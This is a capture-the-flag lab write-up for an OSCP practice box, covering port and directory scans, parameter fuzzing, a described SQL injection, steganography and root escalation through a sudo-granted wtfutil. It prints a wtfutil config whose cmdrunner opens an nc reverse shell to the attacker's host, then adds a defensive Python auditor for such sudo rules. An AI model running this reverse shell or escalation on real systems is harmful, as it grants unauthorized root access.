OSCP Lab
Lab introduction
Box: art
Difficulty: easy
Techniques: fuzz testing, SQL injection, image steganography, wtfutil privilege escalation
Information gathering
Host discovery
Port scanning
└─# nmap -sV -A -p- -T4 192.168.31.86
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 11:46 EST
Nmap scan report for 192.168.31.86
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 45:42:0f:13:cc:8e:49:dd:ec:f5:bb:0f:58:f4:ef:47 (RSA)
| 256 12:2f:a3:63:c2:73:99:e3:f8:67:57:ab:29:52:aa:06 (ECDSA)
|_ 256 f8:79:7a:b1:a8:7e:e9:97:25:c3:40:4a:0c:2f:5e:69 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:EE:DB:E9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.31.86
Directory scanning
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.86/ -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.86/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.86/index.php (Status: 200) [Size: 170]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
Following the hint, fuzz the parameter name of index.php
┌──(root㉿kali)-[~/下载]
└─# ffuf -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -u http://192.168.31.86/index.php?FUZZ=id -fs 170
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.31.86/index.php?FUZZ=id
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 170
________________________________________________
[Status: 200, Size: 70, Words: 11, Lines: 5, Duration: 7ms]
* FUZZ: tag
Opening the discovered parameter shows an image.
Gaining access
Testing shows that this page has a SQL injection vulnerability in the tag parameter
http://192.168.31.86/index.php?tag=beauty
From here some usernames, passwords and images were obtained.
Brute-forcing SSH with these credentials did not succeed.
The last image turned out to contain hidden data (steganography).
Privilege escalation
sudo -l reveals wtfutil, which is used to escalate to root
$ sudo -l
Matching Defaults entries for lion on art:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User lion may run the following commands on art:
(ALL : ALL) NOPASSWD: /bin/wtfutil
About wtfutil: https://wtfutil.com/
The exploit configuration is as follows (based on the project's sample config):
https://github.com/wtfutil/wtf/blob/master/_sample_configs/small_config.yml
lion@art:/tmp$ cat config.yml
wtf:
  grid:
    columns: [40, 40]
    rows: [4, 4]
  refreshInterval: 1
  mods:
    disks:
      type: cmdrunner
      cmd: "nc"
      args: ["-e", "/bin/bash", "192.168.31.181", "8888"]
      enabled: true
      position:
        top: 3
        left: 1
        height: 1
        width: 3
      refreshInterval: 3
sudo /bin/wtfutil --config=/tmp/config.yml
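The root cause of this escalation is a sudo rule that grants wtfutil with no argument restriction, so the user picks the config file and, through the cmdrunner module, the command root executes. As an added defender-side example (not from the original write-up), the following Python auditor parses `sudo -l` output and flags exactly that condition; the sample output, the watch-list of config-driven executors and the suggested pinned config path are constructed.

```python
import re

# Constructed `sudo -l` output, modelled on the listing above plus two
# contrasting rules: wtfutil with pinned arguments, and an unrelated command.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lion on art:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lion may run the following commands on art:
    (ALL : ALL) NOPASSWD: /bin/wtfutil
    (root) NOPASSWD: /bin/wtfutil --config=/etc/wtf/config.yml
    (root) /usr/bin/systemctl restart nginx
"""

# Hypothetical watch-list of binaries that execute commands read from a
# caller-supplied config file (wtfutil's cmdrunner module is the case here).
CONFIG_DRIVEN_EXECUTORS = {"wtfutil"}

# A sudoers rule as printed by `sudo -l`: (runas) [TAG: ...] /path/cmd [args]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$")


def parse_sudo_rules(sudo_l_text):
    """Extract command rules from `sudo -l` output; header/Defaults lines are skipped."""
    rules = []
    for line in sudo_l_text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"].strip(), "cmd": m["cmd"],
                          "args": m["args"].strip(),
                          "nopasswd": "NOPASSWD:" in m["tags"]})
    return rules


def audit_sudo_rules(rules):
    """Flag rules that grant a config-driven executor with no argument restriction:
    the caller then picks the config file, and so the commands run as the runas user."""
    findings = []
    for r in rules:
        binary = r["cmd"].rsplit("/", 1)[-1]
        if binary in CONFIG_DRIVEN_EXECUTORS and r["args"] == "":
            findings.append({**r, "fix": f"pin the arguments, e.g. {r['cmd']} "
                             "--config=/etc/wtf/config.yml, with that file root-owned "
                             "and not writable by the user"})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        print(f"[!] {f['cmd']} as {f['runas']} with arbitrary arguments "
              f"(NOPASSWD={f['nopasswd']}): {f['fix']}")
```

Pinning the arguments only helps if the referenced config file and its directory are not writable by the sudoer, otherwise the same cmdrunner trick still applies.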
End
Originally published on the WeChat public account (贝雷帽SEC): 【OSCP】art